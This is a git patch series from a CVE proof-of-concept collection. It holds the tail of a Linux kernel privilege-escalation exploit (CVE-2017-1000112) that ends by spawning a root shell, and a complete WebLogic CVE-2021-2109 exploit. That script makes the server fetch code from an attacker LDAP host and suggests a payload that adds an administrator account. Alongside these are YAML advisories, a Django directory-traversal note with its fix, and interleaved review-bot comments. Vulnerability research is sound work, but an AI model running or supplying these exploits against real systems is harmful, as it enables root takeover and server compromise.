assert((found - &buffer[0]) + needle_length + i < length); + output[i] = found[needle_length + i]; + } +} + +void get_kernel_version(char* output, int max_length) { + struct utsname u; + int rv = uname(&u); + if (rv != 0) { + perror("[-] uname())"); + exit(EXIT_FAILURE); + } + assert(strlen(u.release) <= max_length); + strcpy(&output[0], u.release); +} + +#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) + +#define DISTRO_CODENAME_LENGTH 32 +#define KERNEL_VERSION_LENGTH 32 + +void detect_versions() { + char codename[DISTRO_CODENAME_LENGTH]; + char version[KERNEL_VERSION_LENGTH]; + + get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH); + get_kernel_version(&version[0], KERNEL_VERSION_LENGTH); + + int i; + for (i = 0; i < ARRAY_SIZE(kernels); i++) { + if (strcmp(&codename[0], kernels[i].distro) == 0 && + strcmp(&version[0], kernels[i].version) == 0) { + printf("[.] kernel version '%s' detected\n", kernels[i].version); + kernel = i; + return; + } + } + + printf("[-] kernel version not recognized\n"); + exit(EXIT_FAILURE); +} + +#define PROC_CPUINFO_LENGTH 4096 + +// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP +int smap_smep_enabled() { + char buffer[PROC_CPUINFO_LENGTH]; + int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH); + if (length == -1) { + perror("[-] open/read(/proc/cpuinfo)"); + exit(EXIT_FAILURE); + } + int rv = 0; + char* found = memmem(&buffer[0], length, "smep", 4); + if (found != NULL) + rv += 1; + found = memmem(&buffer[0], length, "smap", 4); + if (found != NULL) + rv += 2; + return rv; +} + +void check_smep_smap() { + int rv = smap_smep_enabled(); + if (rv >= 2) { + printf("[-] SMAP detected, no bypass available\n"); + exit(EXIT_FAILURE); + } +#if !ENABLE_SMEP_BYPASS + if (rv >= 1) { + printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n"); + exit(EXIT_FAILURE); + } +#endif +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +static bool write_file(const char* file, const char* what, 
...) { + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + close(fd); + return false; + } + close(fd); + return true; +} + +void setup_sandbox() { + int real_uid = getuid(); + int real_gid = getgid(); + + if (unshare(CLONE_NEWUSER) != 0) { + printf("[!] unprivileged user namespaces are not available\n"); + perror("[-] unshare(CLONE_NEWUSER)"); + exit(EXIT_FAILURE); + } + if (unshare(CLONE_NEWNET) != 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + exit(EXIT_FAILURE); + } + + if (!write_file("/proc/self/setgroups", "deny")) { + perror("[-] write_file(/proc/self/set_groups)"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) { + perror("[-] write_file(/proc/self/uid_map)"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { + perror("[-] write_file(/proc/self/gid_map)"); + exit(EXIT_FAILURE); + } + + cpu_set_t my_set; + CPU_ZERO(&my_set); + CPU_SET(0, &my_set); + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } + + if (system("/sbin/ifconfig lo mtu 1500") != 0) { + perror("[-] system(/sbin/ifconfig lo mtu 1500)"); + exit(EXIT_FAILURE); + } + if (system("/sbin/ifconfig lo up") != 0) { + perror("[-] system(/sbin/ifconfig lo up)"); + exit(EXIT_FAILURE); + } +} + +void exec_shell() { + char* shell = "/bin/bash"; + char* args[] = {shell, "-i", NULL}; + execve(shell, args, NULL); +} + +bool is_root() { + // We can't simple check uid, since we're running inside a namespace + // with uid set to 0. Try opening /etc/shadow instead. + int fd = open("/etc/shadow", O_RDONLY); + if (fd == -1) + return false; + close(fd); + return true; +} + +void check_root() { + printf("[.] 
checking if we got root\n"); + if (!is_root()) { + printf("[-] something went wrong =(\n"); + return; + } + printf("[+] got r00t ^_^\n"); + exec_shell(); +} + +int main(int argc, char** argv) { + printf("[.] starting\n"); + + printf("[.] checking distro and kernel versions\n"); + detect_versions(); + printf("[~] done, versions looks good\n"); + + printf("[.] checking SMEP and SMAP\n"); + check_smep_smap(); + printf("[~] done, looks good\n"); + + printf("[.] setting up namespace sandbox\n"); + setup_sandbox(); + printf("[~] done, namespace sandbox set up\n"); + +#if ENABLE_KASLR_BYPASS + printf("[.] KASLR bypass enabled, getting kernel addr\n"); + KERNEL_BASE = get_kernel_addr(); + printf("[~] done, kernel text: %lx\n", KERNEL_BASE); +#endif + + printf("[.] commit_creds: %lx\n", COMMIT_CREDS); + printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED); + + unsigned long payload = (unsigned long)&get_root; + +#if ENABLE_SMEP_BYPASS + printf("[.] SMEP bypass enabled, mmapping fake stack\n"); + mmap_stack(); + payload = XCHG_EAX_ESP_RET; + printf("[~] done, fake stack mmapped\n"); +#endif + + printf("[.] executing payload %lx\n", payload); + oob_execute(payload); + printf("[~] done, should be root now\n"); + + check_root(); + + return 0; +} diff --git a/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml new file mode 100644 index 00000000..975ce499 --- /dev/null +++ b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml 
@@ -0,0 +1,20 @@
+id: CVE-2017-1000112
+source: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112
+info:
+ name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
+ severity: medium
+ description: |
+ 由于UFO到非UFO的路径切换,导致可被利用的内存损坏。
+ scope-of-influence:
+ linux_kernel <= 4.13.9
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-1000112
+ - https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112
+ classification:
+ cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.0
+ cve-id: CVE-2017-1000112
+ cwe-id: CWE-362
+ cnvd-id: None
+ kve-id: None
+ tags: kernel, Privelege Escalation
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 52d07ef1..b4e66ec7 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -43,6 +43,7 @@ cve:
 Influx-DB:
 - CVE-2019-20933
 linux-kernel:
+ - CVE-2017-1000112
 - CVE-2021-4204
 - CVE-2021-29155
 - CVE-2021-22555
From 59e3faf5c22d214254bfc03f792ff6600dd27d19 Mon Sep 17 00:00:00 2001
From: zhangqianyun
Date: Fri, 7 Apr 2023 18:09:13 +0800
Subject: [PATCH 067/109] Move CVE-2017-1000112 from openkylin_list.yaml to other_list.yaml
---
 openkylin_list.yaml | 1 -
 other_list.yaml | 1 +
 2 files changed, 1 insertion(+), 1 deletion(-)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index b4e66ec7..52d07ef1 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -43,7 +43,6 @@ cve:
 Influx-DB:
 - CVE-2019-20933
 linux-kernel:
- - CVE-2017-1000112
 - CVE-2021-4204
 - CVE-2021-29155
 - CVE-2021-22555
diff --git a/other_list.yaml b/other_list.yaml
index 5e9b12b0..c02895cc 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -1,6 +1,7 @@
 #此收录漏洞列表为非openKylin发行版用例。
 cve:
 linux-kernel:
+ - CVE-2017-1000112
 - CVE-2019-16884
 - CVE-2021-33909
 - CVE-2021-3493
From bf06d878e6e0f3fe493f26bd7a2d446f8766ead1 Mon Sep 17 00:00:00 2001
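Review bot: The `tags` line of the new CVE-2017-1000112.yaml misspells its second tag; it should read `tags: kernel, Privilege Escalation`. Tags appear to be the cross-descriptor index for this repository (other entries use values such as "Directory traversal" and "information disclosure"), so a misspelled tag silently drops this entry from any "Privilege Escalation" lookup.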
From: zhangqianyun <12730721+zhangqianyun@user.noreply.gitee.com> Date: Mon, 10 Apr 2023 06:21:16 +0000 Subject: [PATCH 068/109] update cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml. Signed-off-by: zhangqianyun <> --- cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml index 975ce499..dea96fb8 100644 --- a/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml +++ b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml @@ -1,8 +1,8 @@ id: CVE-2017-1000112 source: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112 info: - name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. - severity: medium + name: Linux内核是Linux基金会的开源操作系统Linux所使用的内核。 + severity: high description: | 由于UFO到非UFO的路径切换,导致可被利用的内存损坏。 scope-of-influence: From 3526c1de9beb034c97589f422caa6cef8d9052e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BB=A3=E5=B0=8F=E9=B9=8F?= Date: Mon, 10 Apr 2023 15:29:44 +0800 Subject: [PATCH 069/109] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2021-31542?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/django/2021/CVE-2021-31542/README.md | 27 ++++++++++++++++++++++++ cve/django/2021/yaml/CVE-2021-31542.yaml | 22 +++++++++++++++++++ openkylin_list.yaml | 1 + 3 files changed, 50 insertions(+) create mode 100644 cve/django/2021/CVE-2021-31542/README.md create mode 100644 cve/django/2021/yaml/CVE-2021-31542.yaml diff --git a/cve/django/2021/CVE-2021-31542/README.md b/cve/django/2021/CVE-2021-31542/README.md new file mode 100644 index 00000000..9d77b142 --- /dev/null +++ b/cve/django/2021/CVE-2021-31542/README.md 
@@ -0,0 +1,27 @@ +## Django上传文件目录穿越漏洞——CVE-2021-31542 +## 漏洞描述 +Django 3.2.1, 3.1.9, and 2.2.21: CVE-2021-31542: Potential + directory-traversal via uploaded files + +在这些版本的Django中使用`MultiPartParser`, `UploadedFile`, 和 `FieldFile` 时,存在构造特别的文件名../等进行目录穿越漏洞。 +构造文件名参考:/tmp/../path + +## 修复方案: +空文件名和带..的文件名都将拒绝 + +在文件:django/core/files/utils.py 中添加方法: +``` +def validate_file_name(name): + if name != os.path.basename(name): + raise SuspiciousFileOperation("File name '%s' includes path elements" % name) + + # Remove potentially dangerous names + if name in {'', '.', '..'}: + raise SuspiciousFileOperation("Could not derive file name from '%s'" % name) + + return name +``` + + +**参考 commit** +https://github.com/django/django/commit/04ac1624bdc2fa737188401757cf95ced122d26d diff --git a/cve/django/2021/yaml/CVE-2021-31542.yaml b/cve/django/2021/yaml/CVE-2021-31542.yaml new file mode 100644 index 00000000..f4db55bd --- /dev/null +++ b/cve/django/2021/yaml/CVE-2021-31542.yaml @@ -0,0 +1,22 @@ +id: CVE-2021-31542 +source: + https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md +info: + name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 + severity: high + description: | + 在Django 2.2(2.2.21之前)、3.1(3.1.9之前)和3.2(3.2.1之前)中,MultiPartParser、UploadedFile和FieldFile允许通过上传文件和适当伪造的文件名进行目录穿越。 + scope-of-influence: + Django 2.2.x - 2.2.21 + Django 3.1.x - 3.1.9 + Django 3.2.x - 3.2.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-31542 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-31542 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: Django, Directory traversal \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 52d07ef1..211571f6 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml 
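Review bot: `scope-of-influence` in the new CVE-2021-31542.yaml lists `Django 2.2.x - 2.2.21`, `Django 3.1.x - 3.1.9` and `Django 3.2.x - 3.2.1`, but the `description` two lines above states the flaw is fixed in exactly those releases ("2.2.21之前", "3.1.9之前", "3.2.1之前"), so the ranges read as if the fixed versions were still affected. Writing the bounds as exclusive, e.g. `Django 2.2.x < 2.2.21`, `Django 3.1.x < 3.1.9`, `Django 3.2.x < 3.2.1`, removes the ambiguity and matches the comparison style used in the CVE-2017-1000112 descriptor (`linux_kernel <= 4.13.9`).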
@@ -148,6 +148,7 @@ cve: - CVE-2021-3537 django: - CVE-2022-28346 + - CVE-2021-31542 fortinac: - CVE-2022-39952 redis: From 7f856b2e19631e2e57bc5954a8e95ababe3f2530 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Fri, 7 Apr 2023 06:12:35 +0000 Subject: [PATCH 070/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2021/.keep diff --git a/cve/weblogic/2021/.keep b/cve/weblogic/2021/.keep new file mode 100644 index 00000000..e69de29b From 0d89980ac9ad234186fbcfb3b274120019be23a0 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Fri, 7 Apr 2023 06:13:53 +0000 Subject: [PATCH 071/109] add CVE-2021-2109 Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- .../2021/CVE-2021-2109/CVE-2021-2109.py | 168 ++++++++++++++++++ cve/weblogic/2021/yaml/CVE-2021-2109.yaml | 20 +++ 2 files changed, 188 insertions(+) create mode 100644 cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py create mode 100644 cve/weblogic/2021/yaml/CVE-2021-2109.yaml diff --git a/cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py b/cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py new file mode 100644 index 00000000..8e27590b --- /dev/null +++ b/cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py 
@@ -0,0 +1,168 @@ +import urllib.request, urllib.parse, http.cookiejar, ssl +import sys, os, optparse, subprocess, threading, time + +## Static vars; change at will, but recommend leaving as is +sURL = 'http://192.168.0.100:7001' +iTimeout = 5 +oRun = None + +## Ignore unsigned certs, if any because WebLogic is default HTTP +ssl._create_default_https_context = ssl._create_unverified_context + +class runJar(threading.Thread): + def __init__(self, sJarFile, sCMD, sAddress): + self.stdout = [] + self.stderr = '' + self.cmd = sCMD + self.addr = sAddress + self.jarfile = sJarFile + self.proc = None + threading.Thread.__init__(self) + + def run(self): + self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) + for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) + for line in iter(self.proc.stderr.readline, ''): self.stderr += line + + +def findJNDI(): + sCurDir = os.getcwd() + sFile = '' + for file in os.listdir(sCurDir): + if 'JNDI' in file and '.jar' in file: + sFile = file + print('[+] Found and using ' + sFile) + return sFile + +def findJAVA(bVerbose): + try: + oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) + except: + exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') + sResult = list(oProc.stdout)[0].decode() + if bVerbose: print('[+] Found Java: ' + sResult) + +def checkParams(options, args): + if args: sHost = args[0] + else: + sHost = input('[?] Please enter the URL ['+sURL+'] : ') + if sHost == '': sHost = sURL + if sHost[-1:] == '/': sHost = sHost[:-1] + if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost + if options.username: sUser = options.username + else: + sUser = input('[?] 
Username [weblogic] : ') + if sUser == '': sUser = 'weblogic' + if options.password: sPass = options.password + else: + sPass = input('[?] Password [Passw0rd-] : ') + if sPass == '': sPass = 'Passw0rd-' + if options.command: sCMD = options.command + else: + sCMD = input('[?] Command to run [calc] : ') + if sCMD == '': sCMD = 'calc' + if options.listenaddr: sLHOST = options.listenaddr + else: + sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ') + if sLHOST == '': sLHOST = '192.168.0.10' + if options.verbose: bVerbose = True + else: bVerbose = False + return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) + +def startListener(sJarFile, sCMD, sAddress, bVerbose): + global oRun + oRun = runJar(sJarFile, sCMD, sAddress) + oRun.start() + print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') + oRun.join(3) + if not oRun.stderr == '': + exit('[-] Error starting Java listener:\n' + oRun.stderr) + bThisLine=False + if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') + for line in oRun.stdout: + if bThisLine: return line.split('/')[3].replace('\n','') + if 'JDK 1.8' in line: bThisLine = True + +def endIt(): + global oRun + print('[+] Closing threads') + if oRun: oRun.proc.terminate() + exit(0) + +def main(): + usage = ( + 'usage: %prog [options] URL \n' + ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' + ' in the current working folder\n' + 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n' + 'Only works when hacker is reachable via an IPv4 address\n' + 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' + 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n' + 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' + ) + + parser = optparse.OptionParser(usage=usage) + parser.add_option('--username', '-u', 
dest='username') + parser.add_option('--password', '-p', dest='password') + parser.add_option('--command', '-c', dest='command') + parser.add_option('--listen', '-l', dest='listenaddr') + parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) + + ## Get or ask for the vars + (options, args) = parser.parse_args() + (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) + + ## Verify Java and JAR file + sJarFile = findJNDI() + findJAVA(bVerbose) + + ## Keep track of cookies between requests + cj = http.cookiejar.CookieJar() + oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + + print('[+] Verifying reachability') + ## Get the cookie + oRequest = urllib.request.Request(url = sHost + '/console/') + oResponse = oOpener.open(oRequest, timeout = iTimeout) + for c in cj: + if c.name == 'ADMINCONSOLESESSION': + if bVerbose: print('[+] Got cookie "' + c.value + '"') + + ## Logging in + lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} + lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} + oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) + oResponse = oOpener.open(oRequest, timeout = iTimeout) + sResult = oResponse.read().decode(errors='ignore').split('\r\n') + bSuccess = True + for line in sResult: + if 'Authentication Denied' in line: bSuccess = False + if bSuccess: print('[+] Succesfully logged in!\n') + else: exit('[-] Authentication Denied') + + ## Launch the LDAP listener and retrieve the random endpoint value + sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) + if bVerbose: print('[+] Got Java value: ' + sRandom) + + ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1" + print('\n[+] Firing exploit now, hold on') 
+ ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-) + sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] + sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' + if bVerbose: print('[!] Using URL ' + sFullUrl) + oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) + oResponse = oOpener.open(oRequest, timeout = iTimeout) + time.sleep(5) + bExploitWorked = False + for line in oRun.stdout: + if 'Log a request' in line: bExploitWorked = True + if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') + if not bExploitWorked: print('[-] Exploit failed, victim likely patched') + else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') + if bVerbose: print(oRun.stderr) + endIt() + +if __name__ == "__main__": + try: main() + except KeyboardInterrupt: endIt() + \ No newline at end of file diff --git a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml new file mode 100644 index 00000000..f8fbc6f7 --- /dev/null +++ b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml 
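Review bot: `findJAVA` wraps the `subprocess.Popen('java -version', ...)` call in a bare `except:`, which also swallows `KeyboardInterrupt` and `SystemExit` and reports every failure as "java not found"; `except OSError:` is the case the message describes. The line after it, `sResult = list(oProc.stdout)[0].decode()`, raises `IndexError` when java prints nothing, so the success path is not guarded either. At module level, `ssl._create_default_https_context = ssl._create_unverified_context` rebinds a private attribute to disable certificate verification for the whole process; if an unverified context is really intended, building one explicitly and attaching it to the opener via `urllib.request.HTTPSHandler(context=ctx)` keeps the choice local and visible. `startListener` also falls off the end (returning `None`) when no "JDK 1.8" line is found, which later surfaces as a `TypeError` in the URL concatenation rather than a clear message.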
@@ -0,0 +1,20 @@ +id: CVE-2021-2109 +source: https://www.exploit-db.com/exploits/49461 +info: + name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + Oracle 融合中间件(组件:控制台)的 Oracle WebLogic Server 产品中的漏洞。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0 和 14.1.1.0.0。容易利用的漏洞允许具有通过 HTTP 进行网络访问的高特权攻击者破坏 Oracle WebLogic Server。成功攻击此漏洞可导致接管 Oracle WebLogic Server。 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0, weblogic 14.1.1.0.0 + reference: + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2109 + https://nvd.nist.gov/vuln/detail/CVE-2021-2109 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-2109 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2020, Weblogic \ No newline at end of file From 737337469af40a50ca50bf5df11084acb78b12f4 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Fri, 7 Apr 2023 06:14:04 +0000 Subject: [PATCH 072/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/weblogic/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/2021/.keep diff --git a/cve/weblogic/2021/.keep b/cve/weblogic/2021/.keep deleted file mode 100644 index e69de29b..00000000 From 55d97abf87e5ec5dfcc0d650413f9516bcbe0b4a Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Mon, 10 Apr 2023 00:49:11 +0000 Subject: [PATCH 073/109] =?UTF-8?q?update=20cve/weblogic/2021/yaml/CVE-202?= =?UTF-8?q?1-2109.yaml.=20=E4=BF=AE=E6=94=B9=E8=AF=84=E7=BA=A7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 
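Review bot: `reference:` in the new CVE-2021-2109.yaml is followed by two bare URLs without the `- ` list marker that the other descriptors in this series use (CVE-2017-1000112.yaml, CVE-2021-31542.yaml), so a YAML parser folds both URLs into one plain scalar instead of a two-item list. Prefix each URL with `- ` so consumers of the descriptor see the same shape for every entry.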
Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- cve/weblogic/2021/yaml/CVE-2021-2109.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml index f8fbc6f7..49f54966 100644 --- a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml +++ b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml @@ -2,7 +2,7 @@ id: CVE-2021-2109 source: https://www.exploit-db.com/exploits/49461 info: name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 - severity: critical + severity: high description: | Oracle 融合中间件(组件:控制台)的 Oracle WebLogic Server 产品中的漏洞。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0 和 14.1.1.0.0。容易利用的漏洞允许具有通过 HTTP 进行网络访问的高特权攻击者破坏 Oracle WebLogic Server。成功攻击此漏洞可导致接管 Oracle WebLogic Server。 scope-of-influence: From d779c47bd6c05d2d06aaf93d5884ec07a07e6d76 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Mon, 10 Apr 2023 00:59:19 +0000 Subject: [PATCH 074/109] update other_list.yaml. add weblogic CVE-2021-2109 Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index c02895cc..ede901d9 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -53,6 +53,7 @@ cve: - CVE-2022-23131 weblogic: - CVE-2022-2555 + - CVE-2021-2109 Zyxel: - CVE-2022-30525 WordPress: From 1085758b57aaca708146d226e5fd08c26823eee8 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Tue, 11 Apr 2023 00:40:28 +0000 Subject: [PATCH 075/109] update cve/weblogic/2021/yaml/CVE-2021-2109.yaml. tag change Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- cve/weblogic/2021/yaml/CVE-2021-2109.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml index 49f54966..9062f792 100644 
--- a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml +++ b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml @@ -17,4 +17,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: cve2020, Weblogic \ No newline at end of file + tags: cve2021, Weblogic \ No newline at end of file From 86246ec2b473e5fdd982d5e7bacbfbf5626eea94 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:51:10 +0000 Subject: [PATCH 076/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b From 4102a21f7600dcb59e120c9f783ca1d39550d8c5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:53:36 +0000 Subject: [PATCH 077/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b From 9d148ec1b4b904c8a95970025646b17d9fff714e Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:54:00 +0000 Subject: [PATCH 078/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/yaml/.keep diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep new file mode 100644 index 00000000..e69de29b From e3b68afcf3ec96bed07b7ca2e9749274d85dd6c2 Mon Sep 